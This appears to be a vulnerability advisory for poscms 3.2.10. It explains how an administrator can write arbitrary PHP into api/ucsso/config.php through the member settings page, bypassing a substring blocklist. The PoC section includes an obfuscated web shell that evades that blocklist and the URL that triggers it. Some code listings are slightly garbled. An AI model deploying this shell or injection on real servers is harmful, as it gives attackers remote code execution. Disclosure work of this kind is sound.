
Affected version

poscms 3.2.10

Precondition

You must be logged in as an Administrator (the vulnerable page is in the admin back end).

Code and root cause:

In the file `diy\module\member\controllers\admin\Setting.php`, in the function `index()`:

1.	public function index() {  
2.	  
3.	$page = (int)$this->input->get('page');  
4.	$result = 0;  
5.	  
6.	if (IS_POST) {  
7.	    $post = $this->input->post('data');  
8.	    $page = (int)$this->input->post('page');  
9.	    // 规则判断  
10.	    if (emptyempty($post['regfield'])) {  
11.	        $this->admin_msg('至少需要选择一个注册字段,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);  
12.	    } elseif (!in_array('email', $post['regfield']) && $post['regverify'] == 1) {  
13.	        $this->admin_msg('开启邮件审核后,注册字段必须选择【邮箱】,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);  
14.	    } elseif (!in_array('email', $post['regfield']) && $post['ucenter'] == 1) {  
15.	        $this->admin_msg('开启Ucenter后,注册字段必须选择【邮箱】,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);  
16.	    } elseif (!in_array('phone', $post['regfield']) && $post['regverify'] == 3) {  
17.	        $this->admin_msg('开启手机验证码审核后,注册字段必须选择【手机】,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);  
18.	    } elseif ($post['ucsso'] && $post['ucenter']) {  
19.	              $this->admin_msg('Ucenter和UCSSO不能同时开启', dr_url('member/setting/index', array('page'=> $page)), 0, 9);  
20.	          }  
21.	    $this->member_model->member($post); 
22.	    $data = $post; //用户的输入
23.	    $cache = $this->member_model->cache(); //进入对应的cache()函数 
24.	          $result = 1;  

On line 23, `member_model->cache()` is called, so we go to the file `diy\module\member\models\Member_model.php`; in the function `cache()` we can see:

1.	$page = (int)$this->input->get('page');
2.			$result = 0;
3.			
4.			if (IS_POST) {
5.				$post = $this->input->post('data');
6.				$page = (int)$this->input->post('page');
7.				// 规则判断
8.				if (empty($post['regfield'])) {
9.					$this->admin_msg('至少需要选择一个注册字段,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);//这里需要注意
10.				} elseif (!in_array('email', $post['regfield']) && $post['regverify'] == 1) {
11.	。。。。。。。。。。。。。。。。。。。。。。略过
12.	// 更新UCSSO配置  
13.	      if ($cache['setting']['ucsso']) {  
14.	          $ucsso = htmlspecialchars_decode($cache['setting']['ucssocfg']);  //vul
15.	          if (strpos($ucsso, 'eval') !== false  
16.	              || strpos($ucsso, '_POST') !== false  
17.	              || strpos($ucsso, '_REQUEST') !== false  
18.	              || strpos($ucsso, '_GET') !== false) {  
19.	              return;  
20.	          }  
21.	          file_put_contents(WEBPATH.'api/ucsso/config.php', $ucsso , LOCK_EX);  //vul
22.	      }  
23.	  
24.	      $this->ci->clear_cache('member');  
25.	      $this->dcache->set('member', $cache);  
26.	  
27.	      return $cache;  
28.	  }  

Because the user controls the value of `$cache['setting']['ucssocfg']`, line 21 writes attacker-controlled content into the file `api/ucsso/config.php`, and the substring blocklist on lines 15–18 is not an effective filter. The underlying defect is that admin-supplied configuration text is written out as executable PHP; a fix would store it as data (for example JSON) and never as code.

Impact

Allows an authenticated administrator to get a shell (remote code execution on the web server).

PoC

一.

1

The shell code can be:

<?php    
error_reporting(0);set_time_limit(0);$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");$a(@${"_P"."O"."S"."T"}[xw]);?>

After the POST, the file `api\ucsso\config.php` will contain it; then you can get a shell by requesting `http://127.0.0.1:8888/index.php?c=myndtt&m=index`.

img

Note: if it does not succeed, the POST body you send may not include `regfield`; you should add it like this:

img